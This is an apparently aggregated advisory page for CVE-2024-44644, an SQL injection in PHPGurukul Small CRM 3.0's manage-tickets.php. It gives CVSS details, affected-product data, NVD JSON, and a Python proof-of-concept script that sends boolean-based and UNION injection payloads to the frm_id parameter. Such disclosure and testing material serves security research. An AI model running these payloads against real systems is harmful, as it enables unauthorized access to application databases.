Security Vulnerability Report
中文
CVE-2024-44644 CVSS 6.5 MEDIUM

CVE-2024-44644

Published: 2025-11-17 17:15:46
Last Modified: 2025-11-19 13:11:43

Description

PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via the frm_id and aremark parameters in manage-tickets.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:small_crm:3.0:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Small CRM 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-44644 SQL Injection PoC # Target: PHPGurukul Small CRM 3.0 # Endpoint: manage-tickets.php # Vulnerable Parameters: frm_id, aremark import requests import sys target = "http://target.com/small-crm/manage-tickets.php" # Boolean-based blind SQL injection payload for frm_id parameter payloads = [ "1' AND 1=1 --", # True condition "1' AND 1=2 --", # False condition "1' UNION SELECT NULL,NULL,NULL,NULL,NULL --", # Union injection "1' AND (SELECT COUNT(*) FROM users) > 0 --", # Check if users table exists ] def test_sql_injection(): print(f"[*] Testing CVE-2024-44644 on {target}") for payload in payloads: params = {'frm_id': payload} try: response = requests.get(target, params=params, timeout=10) print(f"[*] Payload: {payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for SQL error indicators if any(err in response.text.lower() for err in ['sql', 'mysql', 'syntax', 'error']): print("[!] SQL Error detected - vulnerability confirmed!") return True except requests.RequestException as e: print(f"[!] Request failed: {e}") return False if __name__ == "__main__": if test_sql_injection(): print("[+] CVE-2024-44644 vulnerability detected!") else: print("[-] No vulnerability detected or target not accessible")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44644", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:45.877", "lastModified": "2025-11-19T13:11:43.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via the frm_id and aremark parameters in manage-tickets.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:small_crm:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "7E5041FC-F03B-4093-9FA3-33F2158A41C9"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44644.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/small-crm-php/", "source": "[email protected]", "tags": ["Product"]}]}}